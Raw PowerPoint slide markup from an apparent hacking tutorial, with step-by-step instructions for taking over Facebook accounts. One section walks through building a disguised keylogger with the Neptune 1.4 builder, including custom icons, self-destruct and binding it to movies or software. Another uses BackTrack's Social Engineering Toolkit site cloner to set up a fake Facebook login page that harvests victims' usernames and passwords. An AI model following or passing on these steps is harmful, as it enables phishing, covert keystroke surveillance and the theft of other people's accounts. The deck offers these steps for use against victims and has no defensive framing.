              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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Now go to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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'Server Creation'</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tab and press 'Generate new server' under 'server creation', and give name of your key logger and that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</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s it.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng"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Make itself destructive:</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In tab Extra options, you can check 'self destruct on ', if you want that it should be remove after any particular date.</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marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng"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Add Icon:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng"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You can also add any icon to the final key logger file, for that go to 'Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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Creation' tab and select 'Use file icon' under 'server settings' and select any icon file.</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marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng"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Binding:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng"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a:t>
            </a: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You can bind it with any other file also, for that press the file binder button, a window will open(as shown in screen shot)then right click and select 'add file' and then select anything for ex. any software, movie, video, song etc. with which you will bind it.</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marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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After selecting the binding file, go to step 1.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103909" y="0"/>
            <a:ext cx="8506691" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hacking Facebook using key logger:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>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You can restore the previously typed text in case you have lost it. Keystroke logger software works in the hidden mode and invisible on Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000"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Here we use </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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Neptune 1.4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2577767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1043" name="Picture 7" descr="Description: graphical interface of backtrack">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745" y="2000240"/>
            <a:ext cx="4405745" cy="37619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2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="53816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a:xfrm>
            <a:off x="381000" y="428178"/>
            <a:ext cx="4094018" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hacking fb using backtrack 5r3 OS:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"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1)  First of all put your backtrack live USB in your pc if you don’t know how to create backtrack live USB than  because its very important to create backtrack live USB or live CD or DVD to run or install backtrack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>any computer.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401782" y="4046387"/>
            <a:ext cx="4558146" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Open social engineering toolkit to open social engineering toolkit by following the below screenshot information</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endParaRPr lang="en-US" sz="32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38160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Picture 8" descr="Description: select socail engineering toolki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09" y="129067"/>
            <a:ext cx="8582891" cy="672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77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2052" name="Picture 9" descr="Description: website attack vector tool">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5436" y="3538245"/>
            <a:ext cx="4026808" cy="325048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0" descr="Description: http://4.bp.blogspot.com/-lEyfQOSu0NY/T0osSHO9MsI/AAAAAAAAAqE/YEJVogrY4o8/s400/setwithbacktrack4.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186" y="100672"/>
            <a:ext cx="3943057" cy="32510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143" y="100672"/>
            <a:ext cx="4572000" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"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4)   Then select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>website attack vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> by pressing 2 on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233222" y="948555"/>
            <a:ext cx="4572000" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"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   Time to select the attack after selecting website attack vector select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>site cloner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>just by hitting 2 on your keyboard</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endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136241" y="2264578"/>
            <a:ext cx="4572000" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just"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5) Enter the URL: To make a clone to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login page entered https://www.facebook.com and press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>enter., it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>will automatically generate a clone page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"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6) Now add * sign to continue ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>is started then open terminal upper left corner of the screen looks like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command . Now it will show you your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> address copy it by right clicking on mouse. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7375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Picture 11" descr="Description: selecting clone p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9220"/>
            <a:ext cx="8615464" cy="674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0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Picture 12" descr="Description: hacking facebook account step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2" y="138545"/>
            <a:ext cx="8506691" cy="660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37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4098" name="Picture 13" descr="Description: selecting ip addres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968" y="261937"/>
            <a:ext cx="4307031" cy="3304024"/>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4" descr="Description: bingo you have hacked facebook account ">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999" y="3581561"/>
            <a:ext cx="4149437" cy="32536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4703856"/>
            <a:ext cx="4572000" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just"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In step 7 the process start you remember now when you follow step 6 and step 7, then it will come up with all the details of Username and Password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"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This is how we set a trap and hack victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>and password only on Backtrack 5.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166254" y="1780309"/>
            <a:ext cx="4786745" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"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Paste the system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> address into Address bar and it will </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
